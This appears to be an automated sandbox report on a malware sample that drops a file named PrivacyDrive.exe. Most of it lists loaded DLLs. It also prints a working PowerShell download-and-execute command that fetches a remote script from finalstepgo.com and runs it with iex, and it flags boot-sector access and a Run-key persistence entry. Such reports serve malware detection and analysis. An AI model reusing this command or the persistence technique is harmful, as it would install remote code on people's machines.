    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
    Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $textJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,4_2_0050E640
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h4_2_0041E4B6
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h4_2_0041E4F0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004CB540 push ecx; mov dword ptr [esp], 3F800000h4_2_004CB572
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041E570 push ecx; mov dword ptr [esp], 3F800000h4_2_0041E6F3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00448697 pushfd ; iretd 4_2_004486A2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041E7B0 push ecx; mov dword ptr [esp], 3F800000h4_2_0041E99C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00426880 push ecx; mov dword ptr [esp], 3F800000h4_2_004268B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004CB9E0 push ecx; mov dword ptr [esp], 3F800000h4_2_004CBA12
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041EA60 push ecx; mov dword ptr [esp], 3F800000h4_2_0041EC2B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00419A00 push ecx; mov dword ptr [esp], 3F800000h4_2_00419A34
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004ECB30 push ecx; mov dword ptr [esp], 00000000h4_2_004ECB42
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h4_2_00486C06
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h4_2_00486C2D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00502C4E push ecx; ret 4_2_00502C61
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00506C25 push ecx; ret 4_2_00506C38
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041BFA0 push ecx; mov dword ptr [esp], 3F800000h4_2_0041BFEB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00FC2307 push ecx; retf 4_2_00FC2308
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051E0905 push ecx; retf 4_2_051E0906
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00FB2307 push ecx; retf 8_2_00FB2308
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_01210905 push ecx; retf 8_2_01210906

    Persistence and Installation Behavior

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_0045D070
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_0045CD20
    Powershell uses Background Intelligent Transfer Service (BITS)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls32\BitsProxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeJump to dropped file

    Boot Survival

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_0045D070
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_0045CD20
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0041CDA0 QueryServiceStatus,CloseServiceHandle,Sleep,QueryServiceStatus,StartServiceW,GetLastError,Sleep,4_2_0041CDA0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0BebJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0BebJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_004CDA40 SendMessageW,GetWindowRect,IsIconic,GetWindowRect,PostMessageW,IsZoomed,4_2_004CDA40
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,4_2_00489C60
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic,4_2_00489C60
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,4_2_00489D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW,4_2_00489D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00417E90 IsWindow,GetWindowRect,IsWindow,IsWindowVisible,IsIconic,GetWindowRect,SetWindowPos,4_2_00417E90
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
